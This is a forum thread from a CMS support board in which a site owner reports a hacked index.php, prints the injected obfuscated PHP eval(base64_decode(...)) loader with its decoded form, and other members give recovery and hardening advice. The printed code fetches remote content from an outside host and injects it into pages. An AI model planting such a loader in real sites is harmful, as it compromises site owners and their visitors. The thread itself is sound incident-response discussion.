Textpattern CMS support forum

#1 2009-04-21 16:53:07

douglgm
Member
From: Bristol
Registered: 2006-08-23
Posts: 182

[resolved] My index.php file has been changed...

I found that my website wasn’t working today. On examination I discovered this at the bottom of the index.php and an index.htm file that had been created:

<!--eexi6--><?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>

This decodes to:

$l="http://tourreviews.asia/links2/link.php"; if (extension_loaded("curl")){
$ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);}
else{$r=implode("",file($l));} print @$r;

Anyone had anything similar?

#2 2009-04-21 18:29:25

jm
Plugin Author
From: Missoula, MT
Registered: 2005-11-27
Posts: 1,746

Re: [resolved] My index.php file has been changed...

File a ticket with your host (include the file), change your passwords (FTP, SSH, MySQL), and replace index.php (check other files, or just upload a fresh copy of TXP). Your account has most likely been cracked because this has happened to others running different software.

#3 2009-04-21 19:44:30

douglgm
Member
From: Bristol
Registered: 2006-08-23
Posts: 182

Re: [resolved] My index.php file has been changed...

Thanks Jm, the first thing I did was raise a support request with the hosting provider.

As well as the two index files I noticed that the .htaccess file was also compromised.

Doug.

#4 2009-05-02 02:31:27

jsoo
Plugin Author
From: NC, USA
Registered: 2004-11-15
Posts: 1,793

Re: [resolved] My index.php file has been changed...

A couple of my Txp sites were just cracked in a similar manner. I suspect the issue was an old version of punBB I was running on a not-very-active forum, but I’m not at all sure. A lot of crud I need to clean out on my web hosting account…


Code is topiary

#5 2009-05-02 04:05:53

Gocom
Developer Emeritus
From: Helsinki, Finland
Registered: 2006-07-14
Posts: 4,533

Re: [resolved] My index.php file has been changed...

jsoo wrote:

I suspect the issue was an old version of punBB I was running on a not-very-active forum, but I’m not at all sure.

Best practice is not to let the site be “inactive” from the point of view of administration.

It’s very important to check the server activity, and make sure that you change the passwords of FTP, TXP, server users (db etc.) – and so on – on a frequent basis. It’s even more important if you have multiple admins running the site, as more authors make a password leak more likely.

Site authors are usually the biggest security risk, mostly when they know nothing about managing passwords and so forth. It’s kinda important to make sure that your authors don’t always use the same passwords for their accounts, and that they don’t save the passwords on their insecure computers (or on public systems (libraries etc.) that crackers love). Some may say that over half of personal computers are so insecure that you can steal their stored data just by walking in.

Also, updating is very important, and so is not choosing the cheapest host that never updates their system. OS, Apache, PHP – all those things have to be updated. Plus it’s important to be sure that you use secure software. Even TXP plugins must be quality-checked. Hopefully most TXP plugins are secure.

Last edited by Gocom (2009-05-02 04:10:19)

#6 2009-05-02 09:22:44

jsoo
Plugin Author
From: NC, USA
Registered: 2004-11-15
Posts: 1,793

Re: [resolved] My index.php file has been changed...

All good advice — thanks.

Found another malicious file in the plugin cache directory for the sites that went down. (I have since disabled the plugin cache directory for live websites, and from now on will only use this feature on my local setup.) I decoded it and looked over the php code; I don’t have the patience or skill to figure it out entirely, but clearly it is attempting to write additional files to the server.

Fingers crossed that I got out of this one without any serious intrusion. A wake-up call at any rate.


Code is topiary
